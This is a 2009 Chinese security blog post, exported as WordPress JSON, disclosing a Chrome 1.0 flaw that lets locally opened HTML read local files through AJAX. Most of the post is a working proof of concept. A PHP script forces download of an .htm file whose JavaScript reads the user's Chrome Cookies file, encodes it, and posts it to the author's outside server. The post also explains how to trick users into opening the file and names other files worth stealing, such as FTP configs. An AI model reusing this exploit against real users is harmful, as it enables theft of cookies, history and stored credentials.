{"id":151,"date":"2009-04-22T10:38:58","date_gmt":"2009-04-22T10:38:58","guid":{"rendered":""},"modified":"2011-04-25T08:38:00","modified_gmt":"2011-04-25T08:38:00","slug":"google-chrome%e4%bd%bf%e7%94%a8ajax%e8%af%bb%e5%8f%96%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/151.html","title":{"rendered":"Google Chrome\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e"},"content":{"rendered":"

by \u7a7a\u865a\u6d6a\u5b50\u5fc3<\/p>\n

google\u7684\u6d4f\u89c8\u5668Chrome1.0.154.53\uff08\u76ee\u524d\u6700\u65b0\uff09\uff0c\u5b58\u5728ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e\u3002<\/p>\n

\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u8bfb\u53d6\u672c\u5730\u6587\u672c\u6587\u4ef6\uff0c\u5e76\u63d0\u4ea4\u51fa\u6765\u3002<\/p>\n

\u800cChrome\u7684cookie\u9ed8\u8ba4\u4fdd\u5b58\u5728“C:\\Documents and Settings\\administrator\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Cookies”<\/p>\n

Chrome\u7684\u5386\u53f2\u4fdd\u5b58\u5728"C:\\Documents and Settings\\administrator\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\History"<\/p>\n

\u8bfb\u53d6\u8fd9\u4e2a\u6587\u4ef6\uff0c\u7136\u540e\u63d0\u4ea4\uff0c\u524d\u63d0\u662f\u6587\u4ef6\u5728\u672c\u5730\u6253\u5f00\uff0c\u4f46\u662f\u5982\u4f55\u6b3a\u9a97\u7528\u6237\u5728\u672c\u5730\u6253\u5f00\u5462\uff1f<\/p>\n

\u770b\u4ee3\u7801\uff1a<\/p>\n

 <\/p>\n

\n
PHP\u4ee3\u7801<\/div>\n
    \n
  1. <?   <\/span><\/span><\/li>\n
  2. \/* <\/span> <\/li>\n
  3. #     Chrome 1.0.154.53 use ajax read local txt file and upload exp <\/span> <\/span><\/li>\n
  4. #     inbreak.net  <\/span> <\/span><\/li>\n
  5. #     author voidloafer@gmail.com 2009-4-22   <\/span> <\/span><\/li>\n
  6. #     http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php get cookie and save. <\/span> <\/span><\/li>\n
  7. *\/<\/span>  <\/span><\/span><\/li>\n
  8. header(<\/span>"Content-Disposition: attachment;filename=kxlzx.htm"<\/span>);   <\/span><\/li>\n
  9. header(<\/span>"Content-type: application\/kxlzx"<\/span>);   <\/span><\/li>\n
  10. \/* <\/span> <\/li>\n
  11. #     set header, so just download html file,and open it at local. <\/span> <\/span><\/li>\n
  12. *\/<\/span>  <\/span><\/span><\/li>\n
  13. ?>   <\/span><\/li>\n
  14. <form id=<\/span>"form"<\/span> action=<\/span>"http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php"<\/span> method=<\/span>"POST"<\/span>>   <\/span><\/li>\n
  15.     <input id=<\/span>"input"<\/span> name=<\/span>"cookie"<\/span> value=<\/span>""<\/span> type=<\/span>"hidden"<\/span>>   <\/span><\/li>\n
  16. <\/form>   <\/span><\/li>\n
  17. <script>   <\/span><\/li>\n
  18. function<\/span> doMyAjax(user)   <\/span><\/li>\n
  19. {   <\/span><\/li>\n
  20.         <\/span>var<\/span> time = Math.random();   <\/span><\/li>\n
  21. \/* <\/span> <\/li>\n
  22. the cookie at C:\\Documents and Settings\\kxlzx\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default <\/span> <\/span><\/li>\n
  23. and the history at C:\\Documents and Settings\\kxlzx\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\History <\/span> <\/span><\/li>\n
  24. and so on… <\/span> <\/span><\/li>\n
  25. *\/<\/span>  <\/span><\/span><\/li>\n
  26.         <\/span>var<\/span> strPer = <\/span>‘file:\/\/localhost\/C:\/Documents and Settings\/’<\/span>+user+<\/span>‘\/Local Settings\/Application Data\/Google\/Chrome\/User Data\/Default\/Cookies?time=’<\/span>+time;   <\/span><\/li>\n
  27.            <\/span><\/li>\n
  28.         startRequest(strPer);   <\/span><\/li>\n
  29.        <\/span><\/li>\n
  30. }   <\/span><\/li>\n
  31.   <\/span><\/li>\n
  32. function<\/span> Enshellcode(txt)   <\/span><\/li>\n
  33. {   <\/span><\/li>\n
  34. var<\/span> url=<\/span>new<\/span> String(txt);   <\/span><\/li>\n
  35. var<\/span> i=0,l=0,k=0,curl=<\/span>""<\/span>;   <\/span><\/li>\n
  36. l= url.length;   <\/span><\/li>\n
  37. for<\/span>(;i<l;i++){   <\/span><\/li>\n
  38. k=url.charCodeAt(i);   <\/span><\/li>\n
  39. if<\/span>(k<16)curl+=<\/span>"0"<\/span>+k.toString(16);<\/span>else<\/span> curl+=k.toString(16);}   <\/span><\/li>\n
  40. if<\/span> (l%2){curl+=<\/span>"00"<\/span>;}<\/span>else<\/span>{curl+=<\/span>"0000"<\/span>;}   <\/span><\/li>\n
  41. curl=curl.replace(\/(..)(..)\/g,<\/span>"%u$2$1"<\/span>);   <\/span><\/li>\n
  42. return<\/span> curl;   <\/span><\/li>\n
  43. }   <\/span><\/li>\n
  44.   <\/span><\/li>\n
  45.   <\/span><\/li>\n
  46. var<\/span> xmlHttp;   <\/span><\/li>\n
  47. function<\/span> createXMLHttp(){   <\/span><\/li>\n
  48.     <\/span>if<\/span>(window.XMLHttpRequest){   <\/span><\/li>\n
  49.         xmlHttp = <\/span>new<\/span> XMLHttpRequest();           <\/span><\/li>\n
  50.     }   <\/span><\/li>\n
  51.     <\/span>else<\/span> <\/span>if<\/span>(window.ActiveXObject){   <\/span><\/li>\n
  52.         xmlHttp = <\/span>new<\/span> ActiveXObject(<\/span>"Microsoft.XMLHTTP"<\/span>);   <\/span><\/li>\n
  53.     }   <\/span><\/li>\n
  54. }   <\/span><\/li>\n
  55.   <\/span><\/li>\n
  56. function<\/span> startRequest(doUrl){   <\/span><\/li>\n
  57.            <\/span><\/li>\n
  58.     createXMLHttp();   <\/span><\/li>\n
  59.        <\/span><\/li>\n
  60.     xmlHttp.onreadystatechange = handleStateChange;   <\/span><\/li>\n
  61.        <\/span><\/li>\n
  62.     xmlHttp.open(<\/span>"GET"<\/span>, doUrl, true);   <\/span><\/li>\n
  63.        <\/span><\/li>\n
  64.     xmlHttp.send(null);   <\/span><\/li>\n
  65.        <\/span><\/li>\n
  66.        <\/span><\/li>\n
  67. }    <\/span><\/li>\n
  68.   <\/span><\/li>\n
  69. function<\/span> handleStateChange(){   <\/span><\/li>\n
  70.     <\/span>if<\/span> (xmlHttp.readyState == 4 ){   <\/span><\/li>\n
  71.             <\/span>var<\/span> strResponse = <\/span>""<\/span>;   <\/span><\/li>\n
  72.             setTimeout(<\/span>"framekxlzxPost(xmlHttp.responseText)"<\/span>, 3000);    <\/span><\/li>\n
  73.                <\/span><\/li>\n
  74.     }   <\/span><\/li>\n
  75. }   <\/span><\/li>\n
  76.   <\/span><\/li>\n
  77.   <\/span><\/li>\n
  78. function<\/span> framekxlzxPost(text)   <\/span><\/li>\n
  79. {   <\/span><\/li>\n
  80.     document.getElementById(<\/span>"input"<\/span>).value = Enshellcode(text);   <\/span><\/li>\n
  81.     document.getElementById(<\/span>"form"<\/span>).submit();   <\/span><\/li>\n
  82. }   <\/span><\/li>\n
  83.   <\/span><\/li>\n
  84. doMyAjax(<\/span>"administrator"<\/span>);   <\/span><\/li>\n
  85.   <\/span><\/li>\n
  86. <\/script>  <\/span><\/li>\n<\/ol>\n<\/div>\n

    \u6ce8\u610f\uff0c\u672c\u4ee3\u7801\u4e0a\u4f20TXT\u4e4b\u524d\uff0c\u5df2\u7ecf\u505a\u4e86\u52a0\u5bc6\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u6587\u4ef6\u7684\u5b8c\u6574\u6027\uff0c\u5177\u4f53\u7684\u89e3\u5bc6\uff0c\u8bf7\u770b<\/p>\n

    http:\/\/cha88.cn\/safe\/glacierlk.php<\/a><\/p>\n

    \u9009\u62e9shellcode\u89e3\u5bc6<\/p>\n

     <\/p>\n

    \u6d4f\u89c8\u5668\u4f1a\u81ea\u52a8\u4e0b\u5728\u8fd9\u4e2ahtml\u6587\u4ef6\uff0c\u4fdd\u5b58\u4e3akxlzx.htm\u3002<\/p>\n

    \"1.jpg\"<\/a><\/p>\n

    \u4e0b\u8f7d\u540e\uff0c\u7528\u6237\u80af\u5b9a\u4f1a\u53bb\u770b\u770b\u4e0b\u8f7d\u4e86\u4ec0\u4e48\uff0c\u6253\u5f00htm\uff08\u5728\u672c\u5730\uff09\u3002<\/p>\n

    \u6253\u5f00\u540e\uff0c\u6267\u884cJS\uff0c\u628a\u672c\u5730\u7684cookie\uff0chistory\u7b49\uff08\u53ef\u81ea\u5b9a\u4e49\uff09\uff0c\u4e0a\u4f20\u5230\u6076\u610f\u7528\u6237\u5236\u5b9a\u5730\u65b9\u3002<\/p>\n

    POC\u53ef\u4ee5\u6839\u636e\u5b9e\u9645\u60c5\u51b5\u6539\u8fdb\u3002\u6709\u4ee5\u4e0b\u51e0\u70b9\u6ce8\u610f\uff1a<\/p>\n

    \u51e0\u70b9\u8bf4\u660e\uff1a
    \n1\uff0c\u4e0d\u4e00\u5b9a\u975e\u8981\u8bfb\u53d6cookie\uff0c\u4f60\u4e5f\u53ef\u4ee5\u8bfb\u53d6\u5176\u4ed6\u4e1c\u897f\uff0c\u6bd4\u5982ftp\u8f6f\u4ef6\u7684ini\u914d\u7f6e\u6587\u4ef6\u7b49\uff0c\u53ea\u8981\u662ftxt\u5c31\u80fd\u8bfb\u53d6\u3002
    \n2\uff0c\u8bfb\u53d6cookie\u5fc5\u987b\u9884\u6d4b\u672c\u5730\u7528\u6237\u540d\uff0c\u4e0d\u8fc7\u5f88\u591a\u4eba\u90fd\u662fadministrator\u3002
    \n3\uff0c\u53cd\u6b63ajax\u662f\u5f02\u6b65\uff0c\u4f60\u53ef\u4ee5\u540c\u65f6\u8c03\u7528\u51e0\u4e2a\u65b9\u6cd5\u3002
    \n4\uff0c\u6216\u8005\u4f60\u53ef\u4ee5\u53d1\u9001\u4efb\u4f55\u60f3\u8981\u7684\u672c\u5730TXT\u6587\u4ef6\u3002<\/p>\n

    \u5176\u5b9e\u8fd9\u4e2a\u6f0f\u6d1e\u548c\u6211\u4ee5\u524d\u53d1\u7684opera\u672c\u5730\u8bfb\u53d6\u6f0f\u6d1e\u662f\u4e00\u4e2a\u9053\u7406\u7684\u3002<\/p>\n

    \u4f46\u662f\u4f1a\u6bd4\u4ed6\u4e25\u91cd\u4e00\u70b9\uff0c\u56e0\u4e3aChrome\u7684cookie\u6587\u4ef6\u5730\u5740\u662f\u56fa\u5b9a\u7684\u3002<\/strong><\/p>\n

    POC:<\/strong><\/p>\n

     http:\/\/inbreak.net\/kxlzxtest\/testxss\/Chrome.php<\/font><\/a><\/p>\n

    http:\/\/inbreak.net\/kxlzxtest\/testxss\/b.php<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

    google\u7684\u6d4f\u89c8\u5668Chrome1.0.154.53\uff08\u76ee\u524d\u6700\u65b0\uff09\uff0c\u5b58\u5728ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e\u3002<\/p>\n

    \u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u8bfb\u53d6\u672c\u5730\u6587\u672c\u6587\u4ef6\uff0c\u5e76\u63d0\u4ea4\u51fa\u6765\u3002<\/p>\n

    \u800cChrome\u7684cookie\u9ed8\u8ba4\u4fdd\u5b58\u5728“C:\\Documents and Settings\\administrator\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Cookies”<\/p>\n

    Chrome\u7684\u5386\u53f2\u4fdd\u5b58\u5728"C:\\Documents and Settings\\administrator\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\History"<\/p>\n

    \u8bfb\u53d6\u8fd9\u4e2a\u6587\u4ef6\uff0c\u7136\u540e\u63d0\u4ea4\uff0c\u524d\u63d0\u662f\u6587\u4ef6\u5728\u672c\u5730\u6253\u5f00\uff0c\u4f46\u662f\u5982\u4f55\u6b3a\u9a97\u7528\u6237\u5728\u672c\u5730\u6253\u5f00\u5462\uff1f<\/p>\n

    \u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,5],"tags":[47,46,22],"views":8034,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/151"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=151"}],"version-history":[{"count":1,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/151\/revisions"}],"predecessor-version":[{"id":229,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/151\/revisions\/229"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=151"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=151"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=151"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}